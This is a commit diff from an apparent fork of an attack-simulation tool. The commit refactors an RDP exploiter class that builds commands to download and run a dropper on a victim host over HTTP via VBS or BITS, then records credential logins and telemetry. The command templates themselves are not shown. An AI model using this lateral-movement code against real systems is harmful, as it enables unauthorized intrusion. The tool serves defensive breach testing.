forked from p15670423/monkey
small refactor in rdbgrinder
This commit is contained in:
parent
f73fb9f3a9
commit
2f66b77a33
|
@ -280,12 +280,10 @@ class RdpExploiter(HostExploiter):
|
|||
cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||
|
||||
if self._config.rdp_use_vbs_download:
|
||||
download_method = 'VBS'
|
||||
command = RDP_CMDLINE_HTTP_VBS % {
|
||||
'monkey_path': self._config.dropper_target_path_win_32,
|
||||
'http_path': http_path, 'parameters': cmdline}
|
||||
else:
|
||||
download_method = 'BITS'
|
||||
command = RDP_CMDLINE_HTTP_BITS % {
|
||||
'monkey_path': self._config.dropper_target_path_win_32,
|
||||
'http_path': http_path, 'parameters': cmdline}
|
||||
|
@ -316,7 +314,7 @@ class RdpExploiter(HostExploiter):
|
|||
client_factory.done_event.wait()
|
||||
|
||||
if client_factory.success:
|
||||
if download_method == 'BITS':
|
||||
if not self._config.rdp_use_vbs_download:
|
||||
VictimHostTelem("T1197", ScanStatus.USED.value, self.host, BITS_UPLOAD_STRING)
|
||||
exploited = True
|
||||
self.report_login_attempt(True, user, password)
|
||||
|
|
Loading…
Reference in New Issue